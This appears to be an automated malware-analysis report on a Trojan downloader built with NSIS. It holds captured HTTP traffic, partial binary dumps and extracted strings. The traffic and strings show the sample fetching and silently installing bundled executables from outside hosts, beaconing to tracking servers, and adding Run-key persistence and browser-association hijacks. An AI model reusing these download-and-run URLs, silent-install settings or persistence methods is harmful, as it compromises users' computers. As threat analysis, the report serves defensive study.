Content-Type: application/x-msdownload
Content-Length: 58595
Connection: keep-alive
Date: Wed, 09 Dec 2015 22:28:08 GMT
Last-Modified: Wed, 09 Dec 2015 20:28:24 GMT
ETag: "a66865416d1330f1c571c12f4f8c2fea"
Accept-Ranges: bytes
Server: AmazonS3
Age: 41613
X-Cache: Hit from cloudfront
Via: 1.1 8f460f85e7788562e9f2e44d0aedb11b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: wZX_L_EIjMsRp5H97nPRdzmv0gZK5VHBrULbLCc3Sxr95FlWrdhyIg==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 24 Dec 2015 00:28:48 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1444112779"
Last-Modified: Tue, 06 Oct 2015 06:26:19 GMT
Cache-Control: max-age=27832
Content-Length: 116063
Content-Type: application/octet-stream
X-HW: 1450916928.dop010.fr7.t,1450916928.cds007.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...d..K.................d..........^5............@..........................P.......................................................@..8............................................................................................................text....c.......d.................. ..`.rdata...............h..............@..@.data....p...........|..............@....ndata... ... ...........................rsrc...8....@......................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......C..H.P.u..u..u...T.@..B...SV.5..C..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h..C.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$....C...Si.....VW.T.....tO.q.3.;5..C.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..C.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET hXXp://json.agewftkv.com/?adv_id=128&domain=AGEwfTkv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en&w64=0 HTTP/1.1
Host: json.agewftkv.com
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 24 Dec 2015 00:34:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
373..{ .."advID":128, .."primaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."secondaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."requireUnzip":false, .."requireSuccessInstallCheck":true, .."requireExitCodeCheck":false, .."successExitCode":0, .."constParams":"-pub_id=353 -fb -taskbar -ext=pcjnhdkacfipfoicilllfabpbghiegpn",.."mappedParams":[], .."requireRegKeysCheck":true, .."regKeysToCheck":[.."LocalMachine\\SOFTWARE\\Sakura\\gamegogle=*",."LocalMachine\\SOFTWARE\\Wow6432Node\\Sakura\\gamegogle=*"..], .."minutesToSleepBeforeInstall":0,.."preInstallRegCheck": true,.."preInstallRegKeys": [ ..."LocalMachine\\SOFTWARE\\Sakura\\gamegogle=*",."LocalMachine\\SOFTWARE\\Wow6432Node\\Sakura\\gamegogle=*"..],.."blockIfInstalled" : false.}...0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 24 Dec 2015 00:34:42 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..373..{ .."advID":128, .."primaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."secondaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."requireUnzip":false, .."requireSuccessInstallCheck":true, .."requireExitCodeCheck":false, .."successExitCode":0, .."constParams":"-pub_id=353 -fb -taskbar -ext=pcjnhdkacfipfoicilllfabpbghiegpn",.."mappedPa
<<< skipped >>>
GET hXXp://events.agewftkv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg= HTTP/1.1
Host: events.agewftkv.com
Proxy-Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 24 Dec 2015 00:34:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
0..
GET /SilentInstaller_dotnet4.exe HTTP/1.1
Host: d2u4zym7ey0920.cloudfront.net
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 321536
Connection: keep-alive
Date: Tue, 22 Dec 2015 12:43:01 GMT
Last-Modified: Tue, 22 Dec 2015 09:32:50 GMT
ETag: "a85df53ac3cdc0b948809c73b39b0571"
Accept-Ranges: bytes
Server: AmazonS3
Age: 42158
X-Cache: Hit from cloudfront
Via: 1.1 4919a7516ec7acdb985d9d24c36a649b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Ck257rROkJVx5Ros0xI9HVewGDQJh8hFl1C5WoDiTXNhxH9I0456Rw==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....yV................................. ........@.. .......................@............@.................................`...K............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......h....X......p....o..@ ...........................................(....*..~....*...(....*Vs....(....t.........*....*...*..(h...&*2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..( ...&..Z*....0..........(......c.d(!...&..(......*..2..("...&..Z*....0..........(......c.d(#...&..(......*..2..($...&..Z*....0..........(......c.d(%
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1332:
.text
`.rdata
@.data
.ndata
.rsrc
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2F.tmp
tc.dll
t_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&v=2\"}"}
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp
untup.php?sid=554655542
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
.reloc
System.dll
callback%d
@.reloc
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss30.tmp
nss30.tmp
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2F.tmp
//livestatscounter.com/Generic/vos.php?ch=
3a604241f2bb41d3ee1064890c23e1.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2F.tmp
n.php?r=vu_vo2_
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
1938953175.us-east-1.elb.amazonaws.com
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542
hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp
dlgen.php?r=vu_vo2_
Nullsoft Install System v2.46
nst16.tmp_264:
.text
`.rdata
@.data
.rsrc
@.reloc
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
KERNEL32.dll
USER32.dll
GetCPInfo
GetProcessHeap
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst16.tmp
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
AGEwfTkv.com
52.1.45.42:80
ppt.exe_1788:
.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
EnumWindows
USER32.dll
RegCloseKey
RegCreateKeyW
RegOpenKeyW
RegDeleteKeyW
RegDeleteKeyA
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
GetCPInfo
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\9158
%s\Microsoft\Internet Explorer\Quick Launch\9158
%s\9158
%s\%s
%s\*.*
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B5C48CDD-6C11-453D-91B4-59CFCE233D27}
%Program Files%\baidu\ppt.exe
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\2345
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\QQ
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\2345
%s\Microsoft\Internet Explorer\Quick Launch\
%s\My Box.lnk
%s\QQ
%s\2345
k%s\9158
%s\My Box
%s\PPT
%s\Rising Antivirus
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
bf.desktop.bootpage.BootPage2
%s\ElTaces.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\wenguanjia
%s\unins000.exe
%s\wenguanjia
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{1A3BD145-3384-4F81-9F6C-10F045887FD3}
CLSID\{1A3BD145-3384-4F81-9F6C-10F045887FD3}
Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{CF3CDEFB-31BE-43AE-B064-B9C62C883259}
CLSID\{CF3CDEFB-31BE-43AE-B064-B9C62C883259}
Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{33A895C1-4269-466F-9B01-0C8AEFB64AC3}
CLSID\{33A895C1-4269-466F-9B01-0C8AEFB64AC3}
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC1}_is1
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RZC
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQPCMgr
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BaiduPinyin
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345chrome
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PPStream
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IQIYI Video
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GeePlayer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\LiveRoom
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\bfAppEngine
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
qqbrowser.exe
http\shell\open\command
%s\Internet Explorer\iexplore.exe
VVV.taobao.com
%s\Tencent\QQBrowser\qqbrowser.exe
kernel32.dll
Bind.exe_776:
.text
`.rdata
@.data
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
GetCPInfo
GET%sHTTP/1.1
Range: bytes=%d-
%Program Files%\baidu\Bind.exe
nst2B.tmp_2416:
.text
`.rdata
@.data
.ndata
.rsrc
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
\System.dll
\nsExec.dll
\inetc.dll
$$\wininit.ini
%Program Files%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst2B.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nst2B.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw2D.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst2B.tmp
Nullsoft Install System v2.46